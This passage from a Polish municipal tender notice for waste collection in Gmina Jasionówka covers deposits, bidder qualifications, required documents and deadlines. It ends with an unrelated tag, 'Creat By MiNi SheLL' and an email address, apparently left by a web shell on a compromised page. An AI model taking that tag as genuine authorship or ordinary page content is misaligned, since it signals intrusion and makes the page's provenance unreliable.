w oddzielnym, zamkniętym opakowaniu (kopercie) przed upływem terminu składania ofert, w miejscu wskazanym w Rozdziale XI. Opakowanie (kopertę) zawierającą dokument wadialny należy opisać analogicznie do opisu oferty wskazanego w ust. 15 w Rozdziale X, z dopiskiem: wadium. 5. Wadium musi być wniesione najpóźniej do wyznaczonego w Rozdziale XI terminu składania ofert. 6. Wykonawca, który nie wniesie wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 pzp, zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą. 7. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta został wybrana, jako najkorzystniejsza, z zastrzeżeniem, że Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 8. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy. 9. Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 10. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 11. Okoliczności zatrzymania wadium oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa pzp. 12. Zasady wnoszenia wadium określone w niniejszym Rozdziale mają odpowiednie zastosowanie do czynności przedłużania ważności wadium oraz wnoszenia nowego wadium w przypadkach określonych w pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu Gminy Jasionówka, zgodnie z wymogami ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminie (Dz.U. z 2013r. poz. 1399 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże posiadanie wiedzy i doświadczenia poprzez złożenie wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, co najmniej 3 głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w zakresie odbierania zmieszanych odpadów komunalnych oraz odbierania selektywnie zebranych odpadów komunalnych z co najmniej  1 000 nieruchomości - wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. W przypadku wykazania kilku usług na ilości mniejsze niż wymagane, wielkości wynikające z tych referencji będą sumowane w celu spełnienia wymaganego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje następującymi narzędziami i urządzeniami: a) baza magazynowo-transportowa zlokalizowana w Gminie jasionówka lub w odległości nie większej niż 60 km od granicy gminy, na terenie do którego posiada tytuł prawny, b) co najmniej dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych oraz co najmniej dwa pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych, a także co najmniej jeden pojazd do odbierania odpadów bez funkcji kompaktującej, oraz pojazd specjalny, służący jako mobilny punkt zbierania odpadów komunalnych, c) baza magazynowo-transportowa spełniająca wymogi opisane w siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o tym, że osoby, które będą uczestniczyć w zamówieniu, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli wykonawca wykaże, że posiada opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie mniejszej niż 100 000 zł (słownie: sto tysięcy złotych)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia następujących zmian postanowień zawartej umowy: 1) w zakresie wynagrodzenia - gdy nastąpi zmiana stawki podatku od towarów i usług (VAT) w związku ze zmianą przepisów o podatku od towarów i usług - o kwotę będącą różnicą pomiędzy kwotą VAT po zmianie stawki tego podatku; 2) w zakresie terminu wykonania zamówienia: a) z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach, na czas jej działania uniemożliwiającego wykonywanie zamówienia, b) z powodu działań osób trzecich uniemożliwiających wykonanie zamówienia, które to działania nie są konsekwencją winy którejkolwiek ze stron - wyłącznie na okres uniemożliwienia Wykonawcy wykonywania zamówienia. O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien jest poinformować Zamawiającego pisemnie. 4. Strony dopuszczają możliwość zmian redakcyjnych, omyłek pisarskich oraz zmian będących następstwem zmian danych ujawnionych w rejestrach publicznych bez konieczności sporządzania aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jasionowka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Jasionówce ul. Rynek 19, 19-122 Jasionówka - pok. nr 9..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2014 godzina 09:00, miejsce: Urząd Gminy w Jasionówce ul. Rynek 19, 19-122 Jasionówka - pok. nr 1 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com